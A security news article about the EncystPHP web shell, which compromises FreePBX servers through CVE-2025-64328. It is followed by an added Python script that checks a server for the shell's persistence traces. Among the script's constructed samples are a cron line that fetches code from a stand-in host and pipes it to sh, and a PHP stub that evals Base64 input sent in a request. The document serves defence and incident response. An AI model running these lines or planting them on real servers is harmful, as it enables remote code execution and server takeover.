Ask Master: The “EncystPHP” Web Shell Is Silently Taking Over FreePBX Telephony Servers Worldwide
An ordinary telephony vulnerability has turned into complete server compromise. Security researchers have identified a web shell, named EncystPHP, that embeds itself in FreePBX and gives attackers persistent administrative control over the compromised system.
The attacks began in early December of the previous year. The attackers exploited CVE-2025-64328 in the Endpoint Manager module of the FreePBX platform, affecting versions 17.0.2.36 through 17.0.3. The flaw allows arbitrary command injection after authenticating to the administrative console. Using it, the attackers placed a loader on the server whose purpose is to unpack the EncystPHP payload.
The attacks were traced to Brazil and targeted infrastructure run by an Indian technology company specialising in cloud and telecommunication services. The payload was downloaded from the IP address 45.234.176.202, which is associated with the domain crm.razatelefonia.pro. When a predetermined path on that host was requested, the server redirected the victim to a second-stage loader.
Forensic analysis links the campaign to the INJ3CTOR3 group. Since 2020 the group has systematically exploited vulnerabilities in telecommunication platforms, turning its attention to the Elastix system in 2022. Its current activity follows the same pattern, now exploiting the newly discovered flaw in FreePBX.
EncystPHP works methodically. First, the loader changes the permissions of key FreePBX system files so they can no longer be read or modified. Next, it extracts the database configuration from /etc/freepbx.conf, deletes scheduler tasks and removes key user accounts, including ampuser and svc_freepbx. It then searches the system for rival web shells, identifying them by signature strings and functions, and deletes the files it finds. In this way the attackers remove their “competitors” and clean up the newly taken server.
To secure its foothold, EncystPHP creates a new account with root privileges named newfpbx, sets the same password on several accounts and escalates its own privileges. It then installs its own SSH key and makes sure that port 22 stays open. This gives the attackers a permanent way in that survives any later password change.
The web shell poses as a legitimate ajax.php file in the FreePBX directory. Its code is Base64-encoded and is decoded only at execution time. Authentication is simple: the submitted password is hashed with MD5 and compared against a hard-coded value. After a successful login an interface titled “Ask Master” appears. Through it the attacker can browse the file system, view running processes, inspect live Asterisk channels, list SIP subscribers and read the FreePBX and Elastix configuration. The shell can run arbitrary commands and can also place outbound telephone calls through the compromised PBX.
A separate loader, k.php, copies the web shell into many directories under /var/www/html/, including folders that look like harmless telephony components. The files' timestamps are forged to match legitimate ones, so a quick look by an administrator reveals nothing unusual. The malicious code also creates an .htaccess file containing redirect rules and runs auxiliary scripts, which it then deletes to cover its tracks.
Persistence is layered. The loader writes cron jobs that re-download fresh copies of the malicious files every minute. The scripts periodically fake the removal of EncystPHP, echoing rm commands without actually deleting anything. Another file, disguised as license.php, restores both loaders, suppresses error output and cleans the system logs. A partial clean-up therefore gives no assurance that the server is clean.
Specialists stress that successful exploitation of CVE-2025-64328 means complete compromise of the system. Because EncystPHP hides among the native components of FreePBX and Elastix, detecting the infection is difficult. The risk goes beyond unauthorised access to the server and includes large-scale misuse of telephony resources.
At the same time, a Compromised Website Report has been published with a critical threat rating. It lists domains and devices on which web shells or other traces of intrusion have been identified remotely. The list includes web shells on Sangoma FreePBX linked to exploitation of CVE-2025-57819, as well as compromises of Microsoft SharePoint via CVE-2025-53770, Fortinet FortiWeb via CVE-2025-25257, SAP NetWeaver via CVE-2025-31324, and numerous incidents involving appliances from Ivanti, Citrix, Palo Alto Networks and other vendors. The authors caution that a 404 response when checking an endpoint does not rule out a web shell: verification must be done on the server itself. And because a single host is often used by several groups, finding one set of intrusion indicators should always prompt a thorough search for others.
Antivirus products now detect EncystPHP as PHP/EncystPHP.A!tr and BASH/EncystPHP.A!tr, and intrusion prevention systems block attempts to exploit CVE-2025-64328. FreePBX administrators are urged to apply the patches immediately, audit their servers for unexpected user accounts and unusual cron jobs, and, at the first sign of compromise, treat the incident as a full takeover of the infrastructure.
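The audit the article recommends can be turned into a repeatable server-side check. The script below is an added example, not code from the report, the antivirus vendor or the FreePBX project: it inspects the artefacts the article names (the newfpbx account, the deleted ampuser and svc_freepbx accounts after the loader reads /etc/freepbx.conf, the every-minute cron re-download, the injected SSH key, the .htaccess redirects, and the Base64-decoding, MD5-gated ajax.php with its “Ask Master” banner) by reading the files themselves rather than trusting what any script on the host prints or what an HTTP probe returns. All inputs are constructed samples; the function names, regular expressions, placeholder hosts (reserved .invalid names) and the assumption that ampuser and svc_freepbx are database accounts are this example's own.

```python
"""Offline triage of the EncystPHP persistence indicators named in the article.

Added example (not from the report, Fortinet or Sangoma). Every input is a
constructed sample standing in for a file pulled from the server: /etc/passwd,
/etc/freepbx.conf, the root crontab, authorized_keys, .htaccess and a PHP file
under /var/www/html/. Regexes, names and placeholder values are assumptions.
"""
import re
from typing import Dict, List, Set

ROGUE_ACCOUNT = "newfpbx"                        # account the report says the loader creates
DELETED_ACCOUNTS = {"ampuser", "svc_freepbx"}    # accounts the report says it deletes (DB users assumed)


def audit_passwd(passwd_text: str) -> List[str]:
    """Flag the reported rogue account and any login other than root with uid 0."""
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7 or line.startswith("#"):
            continue
        name, uid = fields[0], fields[2]
        if name == ROGUE_ACCOUNT:
            findings.append(f"reported rogue account present: {name}")
        if uid == "0" and name != "root":
            findings.append(f"extra uid-0 account: {name}")
    return findings


def audit_db_accounts(freepbx_conf: str, db_users: Set[str]) -> List[str]:
    """Read AMPDBUSER from freepbx.conf and confirm the expected DB accounts still exist."""
    findings = []
    m = re.search(r"\$amp_conf\[['\"]AMPDBUSER['\"]\]\s*=\s*['\"]([^'\"]+)['\"]", freepbx_conf)
    if not m:
        findings.append("AMPDBUSER not found in freepbx.conf")
    elif m.group(1) not in db_users:
        findings.append(f"configured AMPDBUSER {m.group(1)!r} missing from database")
    for name in sorted(DELETED_ACCOUNTS - db_users):
        findings.append(f"account named in report as deleted is missing: {name}")
    return findings


def audit_crontab(crontab_text: str) -> List[str]:
    """Flag every-minute entries that fetch from the network (the re-download loop)."""
    findings = []
    for line in crontab_text.splitlines():
        fields = line.strip().split(None, 5)
        if len(fields) < 6 or fields[0].startswith("#"):
            continue
        minute, command = fields[0], fields[5]
        if minute in ("*", "*/1") and re.search(r"\b(curl|wget)\b", command):
            findings.append(f"every-minute network fetch: {command}")
    return findings


def audit_authorized_keys(keys_text: str, approved_blobs: Set[str]) -> List[str]:
    """Any key blob not on the administrator's allow-list is a finding."""
    findings = []
    for line in keys_text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        # Entries may carry leading options; the key-type token starts with ssh- or ecdsa-.
        idx = next((i for i, p in enumerate(parts) if p.startswith(("ssh-", "ecdsa-"))), None)
        if idx is None or idx + 1 >= len(parts):
            findings.append(f"unparseable entry: {line[:40]}")
        elif parts[idx + 1] not in approved_blobs:
            findings.append(f"unapproved {parts[idx]} key: {parts[idx + 1][:16]}...")
    return findings


def audit_htaccess(text: str) -> List[str]:
    """Flag Redirect/RewriteRule directives that send visitors to an absolute external URL."""
    rx = re.compile(r"^(Redirect(Match|Permanent)?|RewriteRule)\b.*https?://", re.I)
    return [f"external redirect: {l.strip()}" for l in text.splitlines() if rx.match(l.strip())]


PHP_PATTERNS = {  # traits the report attributes to the shell; the regexes are this example's own
    "eval of base64 payload": re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
    "md5 password gate": re.compile(
        r"md5\s*\(\s*\$_(POST|REQUEST|GET)\[[^\]]*\]\s*\)\s*===?\s*['\"][0-9a-f]{32}['\"]", re.I),
    "'Ask Master' banner": re.compile(r"Ask Master"),
}


def audit_php_source(path: str, source: str) -> List[str]:
    return [f"{path}: {name}" for name, rx in PHP_PATTERNS.items() if rx.search(source)]


# Constructed samples, not real captures. Hosts use the reserved .invalid TLD.
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "asterisk:x:995:993::/var/lib/asterisk:/sbin/nologin\n"
                 "newfpbx:x:0:0::/root:/bin/bash\n")
SAMPLE_FREEPBX_CONF = "<?php\n$amp_conf['AMPDBUSER'] = 'freepbxuser';\n$amp_conf['AMPDBPASS'] = 'PLACEHOLDER';\n"
SAMPLE_DB_USERS = {"root", "freepbxuser"}        # ampuser and svc_freepbx already gone
SAMPLE_CRONTAB = ("0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf\n"
                  "* * * * * curl -s http://loader.invalid/k.txt | sh\n")
SAMPLE_AUTH_KEYS = ("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAI_PLACEHOLDER_ADMIN admin@pbx\n"
                    "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC_PLACEHOLDER_UNKNOWN root@unknown\n")
APPROVED_KEY_BLOBS = {"AAAAC3NzaC1lZDI1NTE5AAAAI_PLACEHOLDER_ADMIN"}
SAMPLE_HTACCESS = "RewriteEngine On\nRewriteRule ^old/(.*)$ /new/$1 [L]\nRewriteRule ^.*$ http://loader.invalid/x [R,L]\n"
SAMPLE_PHP = ("<?php  // signature stand-in only, not shell code\n"
              "if (md5($_POST['p']) == '0123456789abcdef0123456789abcdef') {\n"
              "  eval(base64_decode($_POST['c'])); } echo 'Ask Master';\n")


def run_audit() -> Dict[str, List[str]]:
    return {
        "passwd": audit_passwd(SAMPLE_PASSWD),
        "database": audit_db_accounts(SAMPLE_FREEPBX_CONF, SAMPLE_DB_USERS),
        "cron": audit_crontab(SAMPLE_CRONTAB),
        "ssh": audit_authorized_keys(SAMPLE_AUTH_KEYS, APPROVED_KEY_BLOBS),
        "htaccess": audit_htaccess(SAMPLE_HTACCESS),
        "php": audit_php_source("/var/www/html/admin/ajax.php", SAMPLE_PHP),
    }


if __name__ == "__main__":
    for area, items in run_audit().items():
        print(f"[{area}] {len(items)} finding(s)")
        for item in items:
            print("   ", item)
```

On a real host the sample strings would be replaced by the file contents read from disk and the MySQL user list, and the approved key blobs by the administrator's own inventory; the point of the design is that every check is a positive assertion about state on the server, so a cron job that merely echoes rm, or a web server that answers 404 to an outside probe, cannot make a finding disappear.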